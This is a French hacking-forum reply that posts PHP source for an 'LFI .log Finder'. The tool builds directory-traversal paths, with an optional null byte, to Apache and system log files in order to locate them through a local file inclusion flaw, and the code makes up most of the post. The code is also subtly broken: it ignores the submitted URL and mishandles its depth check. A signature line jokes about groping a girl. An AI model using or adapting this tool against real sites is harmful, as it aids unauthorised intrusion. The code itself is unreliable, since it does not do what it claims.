Vous êtes au niveau: Accueil / N-PN White-Hat Project / Programmation / Langages interprétés / LFI .log Finder (+ Source PHP)






  • STATISTIQUES
  • Il y a eu un total de 0 membres et 24357 visiteurs sur le site dans les dernières 24h pour un total de 24 357 personnes!
    Membres: 2 606
    Discussions: 3 579
    Messages: 32 816
    Tutoriels: 78
    Téléchargements: 38
    Sites dans l'annuaire: 58


  • ANNUAIRE
  • [FR] Microcontest
    Cryptographie: 7, Mathématiques: 8, Image Son Vidéo: 5, Intelligence artificielle: 3, Réseau: 2, Divers: 7, Phy...
    Challenges
    [EN] Big-Daddy
    Big-Daddy est site internet communautaire avec un effectif diversifié, y compris des artistes, des programmeur...
    Hacking
    [EN] w3challs
    Ce site propose différents types de défis informatiques: piratage, craquage, cryptographie, stég...
    Hacking
    [FR] Infomirmo
    Challenge présenté sous la forme de 6 niveaux de difficultés diverses et variées avec chacun plusieurs chall...
    Challenges
    [FR] NewbieContest
    Nous vous proposons une série de challenges regroupant plusieurs domaines allant de l'exploitation de fail...
    Hacking
    [EN] SecurityFocus
    SecurityFocus a été conçu pour faciliter la discussion sur des sujets liés la sécu...
    Vulnérabilités
    [FR] Hackfest
    Le Hackfest est un évènement de sécurité et de piratage informatique au Québec reg...
    Hacking

  • DONATION
  • Si vous avez trouvé ce site internet utile, nous vous invitons à nous faire un don du montant de votre choix via Paypal. Ce don servira à financer notre hébergement.

    MERCI!




Note de ce sujet :
  • Moyenne : 0 (0 vote(s))
  • 1
  • 2
  • 3
  • 4
  • 5
Affichage linéaire
LFI .log Finder (+ Source PHP)
31-01-2013, 11h52 (Modification du message : 31-01-2013, 11h54 par InstinctHack.)
Message : #10
InstinctHack Hors ligne
Posting Freak
*



Messages : 1,366
Sujets : 184
Points: 299
Inscription : Dec 2011
RE: LFI .log Finder (+ Source PHP)
@Swissky, t'es sûrr de ton code ? Tu pense pas ce qu'était ça l'idée :
Code PHP :

<?php
for($i=0;$i<10;$i++)
{
$checkpath = str_repeat("../",$i).$checkpath;
}
 


@Hypnoze57
!is_array($_POST['url']) // condition inutile, car les variables get/post meme ayant une forme valide d'array php, sont considéré comme des chaines de caractères ( sauf grosse erreur de ma part)

EDIT : je propose ma version (qui n'est d'autre que celle de Hypnoze57 mais plus flexible et avec un peu plus de fonctionnalités)

Code PHP :

<?php
/****************************/
/*     Tools coded by       */
/*    Hypnoze57 && Khaled   */
/****************************/
$directory = array(
'logs/',
'apache/logs/',
'etc/httpd/logs/',
'var/www/logs/',
'usr/local/apache/logs/',
'var/log/apache/',
'var/log/apache2/',
'var/log/',
);

$file=array(
    'access_log',
    'error_log',
);

foreach($file as $key1=>$value1)
{
    $file[]=str_replace('_','.',$value1);
}

?>
<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8" />
        <link rel="stylesheet" href="style.css" />
        <link rel="shortcut icon" href="icon.png">
        <title>LFI .log Finder</title>
    </head>
    <body>
        <header style="text-align:center">
                <PRE>
  _     _____ ___     _               _____ _           _          
 | |   |  ___|_ _|   | | ___   __ _  |  ___(_)_ __   __| | ___ _ __
 | |   | |_   | |    | |/ _ \ / _` | | |_  | | '_ \ / _` |/ _ \ '__|
 | |___|  _|  | |   _| | (_) | (_| | |  _| | | | | | (_| |  __/ |  
 |_____|_|   |___| (_)_|\___/ \__, | |_|   |_|_| |_|\__,_|\___|_|  
                              |___/                                
                </PRE>
        </header>
        <form action="" method="post">
            URL: <input type="text" name="url" size="50" placeholder="http://site.com/page.php?page=" /><br />
            Null Byte (%00): <input type="checkbox" name="nullbyte" value="true"><br />
              Sleep : <input type="input" name="sleep" value="0.5"><br />
           Depth : <input type="input" name="depth" value="3"><br />


            <input type="submit" value="Search!" />

        </form>
<?php
if(isset($_POST['url']) && !empty($_POST['url']))
{
    $url = urldecode(htmlentities($_POST['url'], ENT_QUOTES));
    echo '<ul>';

    if(isset($_POST['nullbyte']))
    {
        foreach($file as $key1=>$value1)
        {
            $file[]=$value1.'%00';
        }
    }
    if(isset($_POST['sleep']))
    {
        if(is_numeric($_POST['sleep']))
        {
            $sleep=$_POST['sleep'];
        }
        else
        {
            $sleep=0.5;
        }
    }
    else
    {
        $sleep=0;
    }

    if(isset($_POST['depth']))
    {
        if(is_int($_POST['depth']))
        {
            $depth=$_POST['depth'];        
        }
        else
        {
            $depth=3;
        }
    }
    else
    {
        $depth=0;        
    }

    foreach($directory as $key1=>$value1)
    {
        foreach($file as $key2=>$value2)
        {
            for($i=1;$i<$depth;$i++)
            {
                $path=str_repeat("../",$i).$value1.$value2;
                echo '<li>';
                    echo "<a href='$path'>$path</a>";
                    if(preg_match('#Warning: include|<b>Warning</b>:  include|Warning:  include|<b>Warning:</b> include#', file_get_contents($path)))
                    {
                        echo '<span style="color:red;">[#]Not found!</span>';
                    }
                    else
                    {
                        echo '<span style="color:orange;">[~] Found!</span>';
                    }
                echo '</li>';
            }
        }
    }
    echo '</ul>';
}
?>
        <footer style="text-align:center">
            2013 Hypnoze57 && Khaled
        </footer>
    </body>
</html>
 


(je passe sur les balises <center>/<font> obsolète, les <header>/<footer> hors du <body> :p )
Citation :un jour en cours de java j'ai attrapé les seins d'une fille mais elle m'a frappé en disant "c'est privé !!"
j'ai pas compris pourquoi, je croyais qu'on était dans la même classe
+1 (1) -1 (0) Répondre


Messages dans ce sujet
LFI .log Finder (+ Source PHP) - par Hypnoze57 - 28-01-2013, 21h20
RE: LFI .log Finder - par Kiwazaru - 28-01-2013, 21h32
RE: LFI .log Finder - par Hypnoze57 - 28-01-2013, 21h35
RE: LFI .log Finder - par Shirobi - 28-01-2013, 21h38
RE: LFI .log Finder - par Hypnoze57 - 28-01-2013, 21h40
RE: LFI .log Finder - par Kiwazaru - 28-01-2013, 21h43
RE: LFI .log Finder - par Di0Sasm - 28-01-2013, 22h24
RE: LFI .log Finder (+ Source PHP) - par InstinctHack - 31-01-2013, 11h52

Sujets apparemment similaires…
Sujet Auteur Réponses Affichages Dernier message
  [php] Code source ? Yuri 6 540 17-11-2013, 19h14
Dernier message: Yuri

Atteindre :


Utilisateur(s) parcourant ce sujet : 1 visiteur(s)
N-PN
Accueil | Challenges | Tutoriels | Téléchargements | Forum | Retourner en haut